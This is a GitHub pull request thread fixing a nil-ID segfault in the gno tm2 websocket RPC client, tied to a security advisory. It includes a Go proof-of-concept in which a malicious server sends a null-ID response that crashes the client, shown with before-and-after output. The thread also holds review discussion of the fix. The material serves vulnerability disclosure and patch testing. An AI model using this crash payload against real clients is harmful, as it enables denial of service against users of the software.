fix(tm2/client): segfault on requests containing nil ID

[Davphla]

fix: https://github.com/gnolang/gno/security/advisories/GHSA-83x9-8m84-6fgj

I also fixed the missing nil verification on the non-exploitable client-controlled functions.

---

Single request test:

davd@davd ~/P/gno (master)> go run main.go
[*] Connecting to malicious server...
[*] Sending request...
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x18 pc=0x751ef9]

goroutine 20 [running]:
github.com/gnolang/gno/tm2/pkg/bft/rpc/lib/client/ws.(*Client).runReadRoutine(0xc000214140, {0x90f3d0, 0xc0002100f0})
        /home/davd/Projects/gno/tm2/pkg/bft/rpc/lib/client/ws/client.go:235 +0x2d9
created by github.com/gnolang/gno/tm2/pkg/bft/rpc/lib/client/ws.NewClient in goroutine 1
        /home/davd/Projects/gno/tm2/pkg/bft/rpc/lib/client/ws/client.go:63 +0x245
exit status 2
davd@davd ~/P/gno (master) [1]> git checkout fix/crash-client
Switched to branch 'fix/crash-client'
Your branch is up to date with 'origin/fix/crash-client'.
davd@davd ~/P/gno (fix/crash-client)> go run main.go
[*] Connecting to malicious server...
[*] Sending request...
[!] No crash - vulnerability may be patched

package main

import (
	"context"
	"fmt"
	"net/http"
	"time"

	ws "github.com/gnolang/gno/tm2/pkg/bft/rpc/lib/client/ws"
	types "github.com/gnolang/gno/tm2/pkg/bft/rpc/lib/types"
	"github.com/gorilla/websocket"
)

var upgrader = websocket.Upgrader{}

func main() {
	// Start malicious server
	go http.ListenAndServe(":26657", http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		conn, _ := upgrader.Upgrade(w, r, nil)
		defer conn.Close()

		conn.ReadMessage() // Wait for request
		// Send response with null ID → crashes client
		conn.WriteMessage(1, []byte(`{"jsonrpc":"2.0","id":null}`))
	}))

	time.Sleep(50 * time.Millisecond)

	// Connect victim client
	fmt.Println("[*] Connecting to malicious server...")
	client, _ := ws.NewClient("ws://127.0.0.1:26657")
	defer client.Close()

	fmt.Println("[*] Sending request...")
	ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second)
	defer cancel()

	client.SendRequest(ctx, types.RPCRequest{
		JSONRPC: "2.0",
		ID:      types.JSONRPCStringID("1"),
		Method:  "status",
	})

	// If we get here, the bug is fixed
	fmt.Println("[!] No crash - vulnerability may be patched")
}

[Gno2D2]

🛠 PR Checks Summary

All Automated Checks passed. ✅

Manual Checks (for Reviewers):

• IGNORE the bot requirements for this PR (force green CI check)
• The pull request description provides enough details (checked by @thehowl)

Read More

🤖 This bot helps streamline PR reviews by verifying automated checks and providing guidance for contributors and reviewers.

✅ Automated Checks (for Contributors):

🟢 Maintainers must be able to edit this pull request (more info)
🟢 Pending initial approval by a review team member, or review from tech-staff

☑️ Contributor Actions:

1. Fix any issues flagged by automated checks.
2. Follow the Contributor Checklist to ensure your PR is ready for review.
   • Add new tests, or document why they are unnecessary.
   • Provide clear examples/screenshots, if necessary.
   • Update documentation, if required.
   • Ensure no breaking changes, or include BREAKING CHANGE notes.
   • Link related issues/PRs, where applicable.

☑️ Reviewer Actions:

1. Complete manual checks for the PR, including the guidelines and additional checks if applicable.

📚 Resources:

• Report a bug with the bot.
• View the bot’s configuration file.

Debug

Automated Checks

Maintainers must be able to edit this pull request (more info)

If

🟢 Condition met
└── 🟢 And
    ├── 🟢 The base branch matches this pattern: ^master$
    └── 🟢 The pull request was created from a fork (head branch repo: Davphla/gno)

Then

🟢 Requirement satisfied
└── 🟢 Maintainer can modify this pull request

Pending initial approval by a review team member, or review from tech-staff

If

🟢 Condition met
└── 🟢 And
    ├── 🟢 The base branch matches this pattern: ^master$
    └── 🟢 Not (🔴 Pull request author is a member of the team: tech-staff)

Then

🟢 Requirement satisfied
└── 🟢 If
    ├── 🟢 Condition
    │   └── 🟢 Or
    │       ├── 🟢 User omarsy already reviewed PR 5114 with state APPROVED
    │       ├── 🔴 At least 1 user(s) of the team tech-staff reviewed pull request
    │       └── 🔴 This pull request is a draft
    └── 🟢 Then
        └── 🟢 Not (🔴 This label is applied to pull request: review/triage-pending)

Manual Checks

**IGNORE** the bot requirements for this PR (force green CI check)

If

🟢 Condition met
└── 🟢 On every pull request

Can be checked by

• Any user with comment edit permission

The pull request description provides enough details

If

🟢 Condition met
└── 🟢 And
    ├── 🟢 Not (🔴 Pull request author is a member of the team: core-contributors)
    └── 🟢 Not (🔴 Pull request author is user: dependabot[bot])

Can be checked by

• team core-contributors

[codecov]

Codecov Report

✅ All modified and coverable lines are covered by tests.

📢 Thoughts on this report? Let us know!

[thehowl]

I think the more appropriate fix is to return an error in the UnmarshalJSON method of RPCResponse, which looks to be the real culprit:

gno/tm2/pkg/bft/rpc/lib/types/types.go

Lines 176 to 180 in cd0c845

	// Check if any response ID is set
	if unsafeResp.ID == nil {
	return nil
	}

In fact, we already return an error in the equivalent case of unmarshaling into a RPCRequest.

[zivkovicmilos]

I think the more appropriate fix is to return an error in the UnmarshalJSON method of RPCResponse, which looks to be the real culprit:

gno/tm2/pkg/bft/rpc/lib/types/types.go

Lines 176 to 180 in cd0c845

	// Check if any response ID is set
	if unsafeResp.ID == nil {
	return nil
	}

In fact, we already return an error in the equivalent case of unmarshaling into a RPCRequest.

Agreed, easier to manage.

Just a note on the nullability of the ID:
https://www.jsonrpc.org/specification#response_object

[jefft0]

The CI check of TM2 failed for "TestWALCrash". This happens on many PRs, maybe 25% of the time. After running again it may pass.

[Davphla]

I've simplified the fix by generalizing the error in UnmarshalJSON for Response and Request when ID == nil.
Request with ID == nil can be correct by the specification for implementing notifications, but they aren't supported in tm2 as request always has an ID (see tm2/pkg/bft/rpc/client/client.go:L351).
This may be too strict, this request error can be reverted.

[omarsy]

question: maybe we can remove this and let the parseID return the error ?

[Davphla]

I've simplified it : 6b95e39